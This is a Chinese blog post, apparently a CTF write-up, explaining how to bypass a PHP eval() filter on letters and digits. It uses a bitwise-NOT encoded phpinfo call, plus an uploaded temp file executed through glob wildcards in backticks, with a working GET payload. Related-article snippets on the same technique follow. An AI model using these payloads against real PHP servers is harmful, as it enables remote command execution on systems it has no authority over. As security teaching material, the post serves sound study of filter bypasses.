构造无字母数字的webshell实现任意命令执行

最新推荐文章于 2024-08-18 21:36:31 发布
最新推荐文章于 2024-08-18 21:36:31 发布
阅读量608 收藏 11
点赞数 13
文章标签: java 前端 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75913164/article/details/141114837
版权

相关代码

<?php
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>35){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
        die("NO.");
    }
    eval($code);
}else{
    highlight_file(__FILE__);
}

分析题目可以得知有限制条件:

过滤了大小写字母、数字、_、$,这些方法都无法使用

PHP7中:

PHP7前是不允许用($a)();这样的方法来执行动态函数的,但PHP7中增加了对此的支持。

所以,我们可以通过('phpinfo')();来执行函数,第一个括号中可以是任意PHP表达式。

  因为有大小写字母的限制,我们首先需要将phpinfo这个字符串转换为URL编码,但在linux中~是表示反码,既就是取反。刚好加在前面就可以。所以我们得到:

(~%8F%97%8F%96%91%99%90)();

 测试结果如图所示:

PHP5中:

考虑用“反引号”+“shell”的方式来getshell,因为反引号不属于“字母”、“数字”,所以我们可以执行系统命令,但问题是如何利用无字母、数字、$的系统命令来getshell?科普新的知识:

1、shell下可以利用. 来执行任意脚本

它的作用和source一样,就是用当前的shell执行一个文件中的命令。

比如:当前运行的shell是bash,则. file的意思就是用bash执行file文件中的命令。

用. file执行文件,是不需要file有x权限的。

那么,如果目标服务器上有一个我们可控的文件,那就可以利用.来执行它

这个文件也很好得到,我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是/tmp/phpXXXXXX,文件名最后6个字符是随机的大小写字母。

2、Linux文件名支持用glob通配符代替

执行. /tmp/phpXXXXXX,也是有字母的。此时就可以用到Linux下的glob通配符:

  *可以代替0个及以上任意字符

  ?可以代表1个任意字符

那么,/tmp/phpXXXXXX就可以表示为/*/?????????/???/?????????

但如果执行. /???/?????????,页面会显示错误,这是由于执行. /???/?????????通配符后的文件有很多,例如:

我们可以发现在执行第一个匹配上的文件(即/bin/abrt-cli)的时候就已经出现了错误,导致整个流程停止,根本不会执行到我们上传的文件。

就跟正则表达式类似,glob支持利用[0-9]来表示一个范围。

再来看之前列出可能干扰我们的文件,发现所有文件名都是小写,只有PHP生成的临时文件包含大写字母。我们只要找到一个可以表示“大写字母”的glob通配符,就能精准找到我们要执行的文件。

打开asci码表:

可见大写字母位于64@与91[之间:

我们可以利用[@-[]来表示大写字母:. /???/????????[@-[]

上传文件测试 :

web.html

<!DOCTYPE html>
<html lang="en">
 
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
 
<body>
    <form action="web.php" method="post" enctype="multipart/form-data">
        <input type="file" name="upload_file" id="">
        <input type="submit" value="submit">
    </form>
</body>
 
</html>

web.php

<?php
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>35){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
        die("NO.");
    }
    eval($code);
}else{
    highlight_file(__FILE__);
}

上传一个文件进行测试:

进行抓包测试:

web.php包:

将Content-Type: multipart/form-data;增加到web.php包中

现在我们就可以在这里使用POST构造出临时文件,使用GET匹配临时文件

GE传入的T参数:?><?=`.+/%3f%3f%3f/%3f%3f%3f%3f%3f%3f%3f%3f%[%40-[]`%3b

得到最后的结果:

成功完成。

发呆喜欢发呆
关注
  • 13
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[极客大挑战 2019]RCE ME writeup + 无字母数字命令执行
ShenZ的博客
09-09 393
我以后再半夜开题目我就是【】 知识点 利用取反运算符绕过无字母数字正则表达式 取反之后基本上都是不可见字符 yu22x大佬的php脚本: <?php fwrite(STDOUT,'[+]your function: '); $system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN)); fwrite(STDOUT,'[+]your command: '); $command=str_replace(array("\r\n", "\
Web安全 _ 无字母数字Webshell 总结.pdf
09-06
字母数字Webshell是指避开常规字母数字字符限制的Webshell构造方法。通常,服务器会通过检测输入是否包含字母数字来防止恶意Webshell的注入。然而,这种防护策略可以通过巧妙的编码转换和利用其他非字母数字...
字母数字命令执行(ctfshow web入门 56)
Firebasky的博客
09-12 2977
前面的一篇文章和这道题一样的做法 无字母数字命令执行(ctfshow web入门 55) 需要注意的是:每次上传的文件不一定有大写的文件名,需要多上传几次
字母数字webshell命令执行
weixin_71398630的博客
08-11 452
那么答案就呼之欲出了,我们只要找到一个可以表示“大写字母”的glob通配符,就能精准找到我们要执行的文件。所有方法,都用到了PHP中的变量,需要对变量进行变形、异或、取反等操作,最后动态执行函数。或者叫period,它的作用和source一样,就是用当前的shell执行一个文件中的命令。这个文件也很好得到,我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是。因为反引号不属于“字母”、“数字”,所以我们可以执行系统命令,但问题来了:如何利用无字母数字
命令执行-无字母数字webshell
leekos的博客,分享web安全相关知识~
12-26 2062
命令执行字母数字webshell
php无字母数字代码执行
m0_52432374的博客
04-30 356
字母数字webshell进阶收藏版1
08-03
【描述】:本文主要探讨了在Webshell中如何使用无字母数字的Unicode编码进行高级技巧的实现,包括原理、缩短和压榨三个部分。 【正文】: Webshell是一种用于远程控制服务器的恶意脚本,通常由攻击者植入以获取对...
如何通过非数字与字符的方式实现PHP WebShell详解
08-30
通常,我们编写的WebShell会包含字母数字。然而,为了规避WAF检测,我们需要使用不常见的字符组合来构建WebShell。本文主要关注的是如何利用非字母和非数字字符,并通过PHP的动态函数功能来执行构造的代码。在...
SweetPotato_webshell执行命令版1
08-03
前言管道引用申明if(CreatePipe(ref out_read, ref out_write, ref saAttr, 0)){Console.Write
ctfshow web41 无字母数字命令执行
Sapphire037的博客
10-30 2293
1 首先,捋一捋思路,我们可以先看过滤的字符 比如/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i或者/[a-z0-9]/is 这里可以先看P神的一些不包含数字字母webshell ,大概意思就是通过一些字符互相运算后构造得到我们的payload,了解基本原理之后,我们再看ctfshow中的这样一道例题 <?php /* # -*- coding: utf-8 -*- # @Author: 羽 # @Date: 2020-09-05 20:31
【bashfuck】bashshell实现字母命令执行构造原理
柒月的博客
03-13 863
整个项目的核心是 Linux终端可以通过$'\xxx'的方式执行命令,xxx是字符ascii码的八进制形式,通过这一点,我们可以通过位运算符号和Linux终端的其他特性,在没有数字的情况下继续构造这样的形式以实现字母数字仅用几个字符就实现任意命令执行
ctfshow-web入门——命令执行(2)(web41-web57)
m0_62905745的博客
03-16 1083
本篇文章是ctfshow的web入门部分的命令执行部分wp(web41-web 57),包括一些题目解答,自己的笔记和总结,有错误还希望大家指正,一起学习进步!
CTF中Web各种题目的解题姿势
05-25
Web题型是CTF中常考题型之一,它将实际渗透过程中的技术技巧转化为CTF赛题,主要考察选手在Web渗透技术方面的能力,由于Web渗透涉及的知识点较多,知识面比较广泛,因此系统的总结和练习Web类题,是快速掌握出题人思路的一种有效的方法。
ctfshow命令执行之无数字字母
HoAd'blog
01-28 3483
命令执行-无数字字母getshell前言一、无字母命令执行二、无字母数字命令执行总结 前言 做ctfshow的时候,碰到命令执行的题,发现这两种类型的题很有趣,学到了很多知识。 前置知识: shell下可以利用.来执行任意脚本 Linux文件名支持用glob通配符代替 一、无字母命令执行 方法1 异或:在PHP中,两个字符串执行异或操作以后,得到的还是一个字符串。所以,我们找到某两个非字母数字的字符,他们的异或结果是这个字母即可。 方法2 取反:将汉字(%ff%ff%ff)中的某个字符取出来,来进行取反
命令执行无回显以及无字母数字命令执行
m0re's blog
09-13 1781
前言:最近比赛的时候看到有关命令执行的题目,然后解题过程中发现了无字母数字命令执行,所以这篇文章学习一下这个知识。 本文目录CTFshow web入门55CTFshow红包题第二弹 以ctfshow的题目来学习一下。 CTFshow web入门55 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modifie
字母数字命令执行(ctfshow web入门 55)
热门推荐
Firebasky的博客
09-10 1万+
这几天都没有怎么学习,基本上都是复习学科知识,因为我们要期末考试。刚刚好今天有时间来做了一道命令执行的题,再一次拜读了 p神的文章。受益匪浅。 直接进入正题 源代码 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 20:03:51 # @email: h1x.
【PHP-CTF】无字母数字webshell
尚未佩妥剑 转眼便江湖
10-31 8052
PHP无字母数字构造Webshell 题目 index.php: &lt;?php include 'flag.php'; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)&gt;40){ //检测字符长度 die("Long."); } if(preg_match("...
【Spring框架】
最新发布
m0_71941456的博客
08-18 1038
Spring框架的功能远不止于此,它还包括Spring MVC、Spring Data、Spring Security等多个模块,每个模块都有其独特的应用场景。
网上商品订单转手系统bootpf
weixin_43213064的博客
08-18 563
【代码】springboot网上商品订单转手系统bootpf
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值